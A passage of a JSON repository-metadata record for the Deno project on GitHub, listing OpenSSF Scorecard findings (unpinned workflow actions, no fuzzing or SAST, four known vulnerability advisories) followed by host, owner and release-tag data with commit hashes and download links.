using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/d